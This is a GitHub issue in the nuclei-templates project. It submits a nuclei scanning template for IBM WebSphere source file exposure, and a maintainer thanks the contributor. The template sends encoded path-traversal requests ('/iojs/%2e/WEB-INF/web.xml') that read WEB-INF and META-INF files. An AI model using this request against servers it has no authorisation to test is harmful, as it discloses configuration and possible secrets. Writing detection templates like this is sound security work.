search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
9.02k stars 2.58k forks source link

IBM WebSphere application source file exposure #7274

Closed letfornz closed 1 year ago

letfornz commented 1 year ago

Template Information:

This nuclei templates disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.

Reference

Nuclei Template:

id: ibm-websphere-exposure

info:
  name: IBM WebSphere application source file exposure
  author: r3nz0
  severity: medium
  description: Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories
  tags: ibm,websphere,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/iojs/%2e/WEB-INF/web.xml"
      - "{{BaseURL}}/iojs/%2e/WEB-INF/"
      - "{{BaseURL}}/iojs/%2e/META-INF/"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "web-app"
          - "context-param"
        condition: and

      - type: status
        status:
          - 200
letfornz commented 1 year ago

I was rewarded with this report, but it has not been made public. This is the only evidence I have of vulnerability.

https://github.com/projectdiscovery/nuclei-templates/assets/85194811/0cf86c5f-22e9-40ea-9d25-50eaabcd1f9f

letfornz commented 1 year ago

image

princechaddha commented 1 year ago

Hi @letfornz, Thank you for taking the time to create this issue and for contributing to this project 🍻

The team will shortly validate and format it correctly before raising a PR. Thank you!